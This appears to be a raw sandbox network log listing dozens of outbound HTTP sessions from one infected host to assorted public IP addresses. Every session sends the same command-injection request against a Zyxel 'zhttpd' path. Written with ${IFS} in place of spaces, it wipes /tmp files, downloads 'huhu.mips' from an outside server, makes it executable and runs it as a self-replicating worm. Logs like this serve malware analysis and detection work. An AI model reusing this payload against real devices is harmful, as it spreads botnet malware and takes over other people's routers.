                                      Jan 19, 2024 17:29:45.032033920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7594192.168.2.1437776112.65.99.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.032090902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7595192.168.2.1451878180.47.83.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.032126904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7596192.168.2.145689458.152.50.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.032175064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7597192.168.2.1453578170.254.135.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.032213926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7598192.168.2.1457588209.235.239.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.032258034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7599192.168.2.145274051.223.38.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.032291889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7600192.168.2.1455658185.62.182.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.032341957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7601192.168.2.145435868.13.54.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.035890102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7602192.168.2.1445536211.105.209.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.035936117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7603192.168.2.1443642126.57.232.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.035974979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7604192.168.2.1460370196.104.226.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036000013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7605192.168.2.1449440113.28.228.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036034107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7606192.168.2.145923462.132.74.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036067963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7607192.168.2.1435446199.119.95.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036101103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7608192.168.2.1446160167.120.105.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036164045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7609192.168.2.1437936187.82.178.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036205053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7610192.168.2.1456456130.111.38.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036247969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7611192.168.2.1460128174.97.120.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036279917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7612192.168.2.1451234153.132.34.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036304951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7613192.168.2.143600238.168.159.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036345959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7614192.168.2.144783024.34.121.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036392927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7615192.168.2.1434912104.229.44.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036442041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7616192.168.2.1442902126.147.160.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036480904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7617192.168.2.1437774199.212.106.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036531925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7618192.168.2.1459596112.183.1.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036570072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7619192.168.2.1446850151.229.232.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036604881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7620192.168.2.144540676.165.72.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036667109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7621192.168.2.145604638.104.122.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036679983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7622192.168.2.14606941.86.245.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.036720037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7623192.168.2.1442872204.238.164.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046248913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7624192.168.2.1433088149.115.119.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046272993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7625192.168.2.1447332121.111.117.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046308041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7626192.168.2.1439878219.81.40.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046355009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7627192.168.2.1440596210.8.148.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046395063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7628192.168.2.144250095.30.25.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046439886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7629192.168.2.143631289.30.0.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046472073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7630192.168.2.1451160101.0.234.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046523094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7631192.168.2.1441172211.225.135.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046560049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7632192.168.2.146072680.37.178.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046617985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7633192.168.2.1441654150.235.39.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046670914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7634192.168.2.143395454.49.43.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046700001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7635192.168.2.1436222149.247.29.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046720982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7636192.168.2.143614444.137.179.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046780109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7637192.168.2.1459616206.153.206.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046814919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7638192.168.2.1438972212.102.120.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046857119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7639192.168.2.143408241.209.136.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046896935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7640192.168.2.1434466204.46.208.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046931028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7641192.168.2.14376122.4.57.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.046983957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7642192.168.2.144623691.13.204.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047039032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7643192.168.2.143952219.211.8.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047089100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7644192.168.2.1439586188.145.67.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047127008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7645192.168.2.1441048181.119.93.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047153950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7646192.168.2.1455580209.20.217.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047188044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7647192.168.2.1435684147.112.172.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047240973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7648192.168.2.145415413.156.166.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047261000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7649192.168.2.145121493.116.234.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047303915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7650192.168.2.14540285.60.1.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047355890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7651192.168.2.145492224.177.3.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047410011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7652192.168.2.144140446.244.68.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047430992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7653192.168.2.144254064.82.207.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047476053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7654192.168.2.1443964217.119.73.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047513008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7655192.168.2.145222661.7.167.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047569036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7656192.168.2.1448522175.12.72.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047602892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7657192.168.2.143679095.189.31.73443
                                      TimestampBytes transferredDirectionData
